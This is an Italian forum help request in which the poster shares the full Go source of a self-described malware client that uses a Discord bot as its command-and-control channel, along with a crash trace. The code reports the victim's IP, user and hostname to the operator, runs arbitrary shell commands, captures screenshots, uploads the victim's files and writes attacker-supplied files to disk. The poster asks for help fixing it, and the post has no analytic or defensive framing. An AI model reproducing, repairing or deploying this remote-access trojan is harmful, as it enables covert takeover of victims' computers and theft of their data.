Ultima modifica:
Praticamente quando lo script parte viene online e crea il canale della sessione per il malware, e invia il messaggio iniziale ma non ricevo l'output di nessun comando.
Ho provato su Windows, Linux e android
Nessuno funziona.
Aiuto
Ora abilitando il permesso (tipo la 3 volta) per i messaggi è andato ma da questo errore nell'esecuzione di un comando:
Ho provato su Windows, Linux e android
Nessuno funziona.
Aiuto
Codice:
package main
import (
"fmt"
"image/png"
"io"
"os"
"os/signal"
"os/exec"
"os/user"
"math/rand"
"net"
"net/http"
"runtime"
"strings"
"syscall"
"time"
"github.com/kbinani/screenshot"
"github.com/bwmarrin/discordgo"
)
var myChannelId string // Global variable
func getTmpDir() string {
if runtime.GOOS == "windows" {
return "C:\\Windows\\Tasks\\"
} else {
return "/tmp/"
}
}
func handler(s *discordgo.Session, m *discordgo.MessageCreate) {
// Ignores messages in other channels and own messages
if m.ChannelID != myChannelId || m.Author.ID == s.State.User.ID {
return
}
s.MessageReactionAdd(m.ChannelID, m.ID, "🕐") // Processing...
flag := 0
//Run command
if strings.HasPrefix(m.Content, "c") {
var cmd *exec.Cmd
if runtime.GOOS == "windows" {
cmd = exec.Command("C:\\Windows\\System32\\cmd.exe", "/k", m.Content[14:len(m.Content)])
} else {
cmd = exec.Command("/bin/bash", "-c", m.Content[14:len(m.Content)])
}
out, err := cmd.CombinedOutput()
if err != nil {
out = append(out, 0x0a)
out = append(out, []byte(err.Error())...)
}
// Message is too long, save as file
if (len(out) > 2000-13) {
f, _ := os.CreateTemp(getTmpDir(), "*.txt")
f.Write(out)
fileName := f.Name()
f.Close()
f, _ = os.Open(fileName)
defer f.Close()
fileStruct := &discordgo.File{Name: fileName, Reader: f}
fileArray := []*discordgo.File{fileStruct}
s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
} else {
var resp strings.Builder
resp.WriteString("```bash\n")
resp.WriteString(string(out) + "\n")
resp.WriteString("```")
s.ChannelMessageSendReply(m.ChannelID, resp.String(), m.Reference())
}
flag = 1
} else if m.Content == "s" {
n := screenshot.NumActiveDisplays()
for i := 0; i < n; i++ {
bounds := screenshot.GetDisplayBounds(i)
img, _ := screenshot.CaptureRect(bounds)
fileName := fmt.Sprintf("%s%d_%dx%d.png", getTmpDir(), i, bounds.Dx(), bounds.Dy())
file, _ := os.Create(fileName)
png.Encode(file, img)
defer file.Close()
f, _ := os.Open(fileName)
defer f.Close()
fileStruct := &discordgo.File{Name: fileName, Reader: f}
fileArray := []*discordgo.File{fileStruct}
s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
}
flag = 1
} else if strings.HasPrefix(m.Content, "d") {
fileName := m.Content[5:len(m.Content)]
f, _ := os.Open(fileName)
fi, _ := f.Stat()
defer f.Close()
if fi.Size() < 8388608 { // 8MB file limit
fileStruct := &discordgo.File{Name: fileName, Reader: f}
fileArray := []*discordgo.File{fileStruct}
s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
flag = 1
} else {
s.ChannelMessageSendReply(m.ChannelID, "File is bigger than 8MB 😔", m.Reference())
}
} else if strings.HasPrefix(m.Content, "u") {
path := m.Content[7:len(m.Content)]
if len(m.Attachments) > 0 {
out, _ := os.Create(path)
defer out.Close()
resp, _ := http.Get(m.Attachments[0].URL)
defer resp.Body.Close()
io.Copy(out, resp.Body)
s.ChannelMessageSendReply(m.ChannelID, "Uploaded file to " + path, m.Reference())
}
flag = 1
} else if m.Content == "💀" {
flag = 2
}
s.MessageReactionRemove(m.ChannelID, m.ID, "🕐", "@me")
if flag > 0 {
s.MessageReactionAdd(m.ChannelID, m.ID, "✅")
if flag > 1 {
s.Close()
os.Exit(0)
}
}
}
func main() {
dg, err := discordgo.New("Bot: Bot token here") // Hardcoded bot token
if err != nil {
// Error creating Discord session
return
}
// Handler for CreateMessage events
dg.AddHandler(handler)
dg.Identify.Intents = discordgo.IntentsGuildMessages
err = dg.Open()
if err != nil {
// Error opening connection
return
}
// Create new channel
rand.Seed(time.Now().UnixNano())
sessionId := fmt.Sprintf("sess-%d", rand.Intn(9999 - 1000) + 1000)
c, _ := dg.GuildChannelCreate("server discord id", sessionId, 0) // Guild ID hardcodedis
myChannelId = c.ID
// Send first message with basic info (and pin it)
hostname, _ := os.Hostname()
currentUser, _ := user.Current()
cwd, _ := os.Getwd()
conn, _ := net.Dial("udp", "8.8.8.8:80")
defer conn.Close()
localAddr := conn.LocalAddr().(*net.UDPAddr)
firstMsg := fmt.Sprintf("Session *%s* opened! 🥳\n\n**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**: %s", sessionId, localAddr.IP, currentUser.Username, hostname, runtime.GOOS, cwd)
m, _ := dg.ChannelMessageSend(myChannelId, firstMsg)
dg.ChannelMessagePin(myChannelId, m.ID)
// Bot is now running (CTRL+C to quit)
sc := make(chan os.Signal, 1)
signal.Notify(sc, syscall.SIGINT, syscall.SIGTERM, os.Interrupt, os.Kill)
<-sc
dg.Close()
}
Ora abilitando il permesso (tipo la 3 volta) per i messaggi è andato ma da questo errore nell'esecuzione di un comando:
Codice:
goroutine 31 [running]:
main.handler(0x6d84000, 0x6f79068)
/data/data/com.termux/files/home/storage/shared/projects/discord-c2/client.go:49 +0x1880
github.com/bwmarrin/discordgo.messageCreateEventHandler.Handle(0x48c20f0, 0x6d84000, {0x48a37b8, 0x6f79068})
/data/data/com.termux/files/home/go/src/github.com/bwmarrin/discordgo/eventhandlers.go:753 +0x40
created by github.com/bwmarrin/discordgo.(*Session).handle
/data/data/com.termux/files/home/go/src/github.com/bwmarrin/discordgo/event.go:171 +0x170
exit status 2